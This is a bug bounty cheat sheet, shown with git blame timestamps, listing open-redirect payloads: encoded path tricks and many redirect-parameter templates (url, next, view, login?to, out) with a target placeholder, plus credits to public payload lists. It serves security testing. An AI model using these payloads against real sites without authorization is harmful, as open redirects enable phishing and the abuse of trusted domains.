bugbounty-cheatsheet/cheatsheets/open-redirect.md

163 lines
1.3 KiB
Markdown
Raw Normal View History

2017-07-14 14:54:44 +01:00
## Open Redirect
```
/%09/google.com
```
```
/%5cgoogle.com
```
2017-07-16 12:48:35 +01:00
2017-07-16 13:37:01 +03:00
```
2017-07-14 14:54:44 +01:00
//www.google.com/%2f%2e%2e
```
```
//www.google.com/%2e%2e
2017-07-16 13:37:01 +03:00
```
2017-08-16 09:16:00 +01:00
```
//google.com/
```
```
//google.com/%2f..
```
2017-09-27 17:48:44 +02:00
## Possible open redirect parameters
```
?url=http://{target}
```
```
?url=https://{target}
```
```
?next=http://{target}
```
```
?next=https://{target}
```
```
?url=https://{target}
```
```
?url=http://{target}
```
```
?url=//{target}
```
```
?url=$2f%2f{target}
```
```
?next=//{target}
```
```
?next=$2f%2f{target}
```
```
?url=//{target}
```
```
?url=$2f%2f{target}
```
```
?url=//{target}
```
```
/redirect/{target}
```
```
/cgi-bin/redirect.cgi?{target}
```
```
/out/{target}
```
```
/out?{target}
```
```
/out?/{target}
```
```
/out?//{target}
```
```
/out?/\{target}
```
```
/out?///{target}
```
```
?view={target}
```
```
?view=/{target}
```
```
?view=//{target}
```
```
?view=/\{target}
```
```
?view=///{target}
```
```
/login?to={target}
```
```
/login?to=/{target}
```
```
/login?to=//{target}
```
```
/login?to=/\{target}
```
```
/login?to=///{target}
```
2017-09-27 17:48:44 +02:00
**Open Redirect Payloads** by @cujanovic
https://github.com/cujanovic/Open-Redirect-Payloads
**Open Redirect Paramters** by @fuzzdb-project
https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/redirect/redirect-urls-template.txt